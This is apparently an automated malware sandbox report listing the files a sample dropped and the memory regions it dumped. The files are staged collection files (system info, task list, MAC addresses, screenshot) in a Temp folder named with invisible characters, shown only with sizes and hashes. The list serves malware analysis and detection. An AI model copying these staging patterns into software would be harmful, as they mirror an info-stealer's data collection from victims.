48855b2f384721eb744dc6ab2d4faeb78563300d60c9f65d2f267f3f9d836cfd04ac1baeef1970a32c6bd4f68cba6a933fc6b4127ce31e323f7e46021726abb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \Directories\Downloads.txt

Filesize
703B

MD5
bac6d3579721d2de1eaa50e3669ab369

SHA1
203a3103d80437384c845e2f1f455071820d561c

SHA256
d567460d6057625adc0826f5d52dc87db10b703d3d3c4310d0893f6661c8ed76

SHA512
5bc7ed0a35c74e5b9307b9c5f2cff0546f11aa218e05f480d48d5d71f39202ff22229684fc44e28f3a59fd75e3d3620bbe73190fd1d277389e9e13a1c5346c4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \Directories\Music.txt

Filesize
458B

MD5
8f36dd88ae36d7a9b7b3f620c109e42c

SHA1
4fb8410d5e4f6a1cb5aab3e16a5dcb57c0aabbee

SHA256
347fa5f27b8ceb5b2f4f2b4a95aaad60c07aa1abd02733316fc11df65779ef84

SHA512
276688ae84b08941d321455f98dc360e98808da3a5313f242d08aa5fc0a4d3bcc65a6f6627c46a421d0dda0462337eeaa966fbc15b40303f92d1717effa92c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \Directories\Pictures.txt

Filesize
619B

MD5
406b00919c3ca778ae2f43b81e33bfa4

SHA1
5194a36004d3af60c3dde5952d84d0a4a359db3d

SHA256
52c2e7d9bb87e6317a53d698bf2be4014d861f8f5617d381f070d7b99e6f5523

SHA512
89c3ead0eebd780f0e61615f0c4db58aaa91939d478292ebdaad9c63029e7d833c3cf9f81c2185c6a7ec8bae9e9e502d207124ac9372da646b4385ab3061193e

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \Display (1).png

Filesize
409KB

MD5
12bcb60ca4d370b9e6d992e7709f0386

SHA1
b0a1be8ef03cac99d10ce414c94931f5b4796074

SHA256
e58f279d77c6133fcb2020389b9374a0afe75f0b98e859b6a08f32a79f1f68fc

SHA512
01707460a4b2379e6ad535e7f0b4489e9b36858ebdd585287718e08d06715312349d157c6bd705b32827d3519a973a71489a56f06aa9262fe2547ac62f015ae9

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \System\MAC Addresses.txt

Filesize
232B

MD5
65c4c8964abf6b843f64e14677c61365

SHA1
c15f2bbb74e9ff10394129256b692b078f6f0638

SHA256
ae03ab868c2ffa58b39a331c1a07d3ea0f8e679570aa9824edf29ff0f199daea

SHA512
25c36a6f330129f21bafa0c26957490fd345c9d17f083749e2e4cb8145a2a84f54befb51b6638f0bfceeab92556beefe4301910309122121e71cb4a73b810106

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \System\System Info.txt

Filesize
2KB

MD5
3bd68dc460cbcfa1de6b7b973968d3ee

SHA1
3adf0d453f69981f6ca65dad8eadd1970cf2c057

SHA256
97d9df65f9e3243ad94b66b157918f6c80e8974603c57f824a18b1b5ccfd0d0b

SHA512
18abaef6d03d62eb4e9e8dcd7f74570f6f2737df4eb50a950db9f163016e5d6dbb60049eda4e7d880c8bf927cfdf32e2f7cc6d5aa7cbede44a9a3781ba7f3cf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎   ‍ \System\Task List.txt

Filesize
11KB

MD5
0b334db086732d191075494f34b86cc4

SHA1
d1a6d02c9aa773b4bd34d6639070054baf15cb82

SHA256
cdd0256bbb693250de1c45bbb0573ce2ba614b2fdf4e40cc2565f80898d7b02e

SHA512
7e518d754d54e52f659b19b8f886c3abb38369a35147597f4b939973e00905212dd57c22cb83a076988c1542a80e91c6a1a6708fe197653c21780c2f0385b067

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ba0bmklt\CSC6B75D09A2D804296A3FD9AA55C079F6.TMP

Filesize
652B

MD5
0449030d5c04fbdf895e7d9100b6b753

SHA1
93bb4500568a4e926a54e4c2d1aabadd606a44d4

SHA256
f9882e57b2d33128fa26c1e56bf8a7cbbc6e3e5665d940b71a9500b93b56f175

SHA512
738172bdbcf461d079b8108397aa8ca605a7820124dcbb9ca5bef1b688d310f6619a34612611626f7790d9ccbbc683778274e0bfa12dce03320f3abd4483bdfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ba0bmklt\ba0bmklt.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ba0bmklt\ba0bmklt.cmdline

Filesize
607B

MD5
5a06bd718850d5aa944392fa249892d0

SHA1
acb27056e583ccb660c1e0b6ad3902d186d40326

SHA256
346a589e81727e2c65e4731cc819b63c6d519281edafc08676274a4188d38f81

SHA512
e2bec7c2925ec20b2a4b90914f1b46be92fe1f3dcfa10a0709de037d0b6ac6b11e121fb56c7c304f55a03d4364625662766f6857c89bdb0b07b2dfa8f09d636e

Download Submit
memory/3900-142-0x0000019B42A50000-0x0000019B42A58000-memory.dmp

Filesize
32KB

Download
memory/4420-66-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp

Filesize
204KB

Download
memory/4420-30-0x00007FF80D570000-0x00007FF80D594000-memory.dmp

Filesize
144KB

Download
memory/4420-104-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp

Filesize
1.5MB

Download
memory/4420-103-0x00007FF80C670000-0x00007FF80C693000-memory.dmp

Filesize
140KB

Download
memory/4420-62-0x00007FF812860000-0x00007FF812879000-memory.dmp

Filesize
100KB

Download
memory/4420-64-0x00007FF8129C0000-0x00007FF8129CD000-memory.dmp

Filesize
52KB

Download
memory/4420-70-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp

Filesize
5.9MB

Download
memory/4420-48-0x00007FF816B10000-0x00007FF816B1F000-memory.dmp

Filesize
60KB

Download
memory/4420-188-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp

Filesize
204KB

Download
memory/4420-71-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp

Filesize
820KB

Download
memory/4420-25-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp

Filesize
5.9MB

Download
memory/4420-73-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp

Filesize
5.2MB

Download
memory/4420-76-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp

Filesize
80KB

Download
memory/4420-80-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp

Filesize
1.1MB

Download
memory/4420-78-0x00007FF811230000-0x00007FF81123D000-memory.dmp

Filesize
52KB

Download
memory/4420-74-0x00007FF80D570000-0x00007FF80D594000-memory.dmp

Filesize
144KB

Download
memory/4420-72-0x00000260A3970000-0x00000260A3E99000-memory.dmp

Filesize
5.2MB

Download
memory/4420-56-0x00007FF815C60000-0x00007FF815C79000-memory.dmp

Filesize
100KB

Download
memory/4420-58-0x00007FF80C670000-0x00007FF80C693000-memory.dmp

Filesize
140KB

Download
memory/4420-60-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp

Filesize
1.5MB

Download
memory/4420-204-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp

Filesize
820KB

Download
memory/4420-205-0x00000260A3970000-0x00000260A3E99000-memory.dmp

Filesize
5.2MB

Download
memory/4420-54-0x00007FF80C750000-0x00007FF80C77D000-memory.dmp

Filesize
180KB

Download
memory/4420-123-0x00007FF812860000-0x00007FF812879000-memory.dmp

Filesize
100KB

Download
memory/4420-226-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp

Filesize
5.2MB

Download
memory/4420-227-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp

Filesize
80KB

Download
memory/4420-234-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp

Filesize
1.5MB

Download
memory/4420-229-0x00007FF80D570000-0x00007FF80D594000-memory.dmp

Filesize
144KB

Download
memory/4420-242-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp

Filesize
1.1MB

Download
memory/4420-228-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp

Filesize
5.9MB

Download
memory/4420-257-0x00007FFFFAE80000-0x00007FFFFAF9C000-memory.dmp

Filesize
1.1MB

Download
memory/4420-253-0x00007FFFFAA50000-0x00007FFFFAB1D000-memory.dmp

Filesize
820KB

Download
memory/4420-260-0x00007FF816B10000-0x00007FF816B1F000-memory.dmp

Filesize
60KB

Download
memory/4420-259-0x00007FF80D570000-0x00007FF80D594000-memory.dmp

Filesize
144KB

Download
memory/4420-258-0x00007FFFFA520000-0x00007FFFFAA49000-memory.dmp

Filesize
5.2MB

Download
memory/4420-252-0x00007FF80C470000-0x00007FF80C4A3000-memory.dmp

Filesize
204KB

Download
memory/4420-248-0x00007FF80C670000-0x00007FF80C693000-memory.dmp

Filesize
140KB

Download
memory/4420-247-0x00007FF815C60000-0x00007FF815C79000-memory.dmp

Filesize
100KB

Download
memory/4420-256-0x00007FF811230000-0x00007FF81123D000-memory.dmp

Filesize
52KB

Download
memory/4420-255-0x00007FF80D1D0000-0x00007FF80D1E4000-memory.dmp

Filesize
80KB

Download
memory/4420-251-0x00007FF8129C0000-0x00007FF8129CD000-memory.dmp

Filesize
52KB

Download
memory/4420-249-0x00007FFFFAB20000-0x00007FFFFAC96000-memory.dmp

Filesize
1.5MB

Download
memory/4420-250-0x00007FF812860000-0x00007FF812879000-memory.dmp

Filesize
100KB

Download
memory/4420-246-0x00007FF80C750000-0x00007FF80C77D000-memory.dmp

Filesize
180KB

Download
memory/4420-243-0x00007FFFFB460000-0x00007FFFFBA50000-memory.dmp

Filesize
5.9MB

Download
memory/4600-89-0x000001AC6F9D0000-0x000001AC6F9F2000-memory.dmp

Filesize
136KB

Download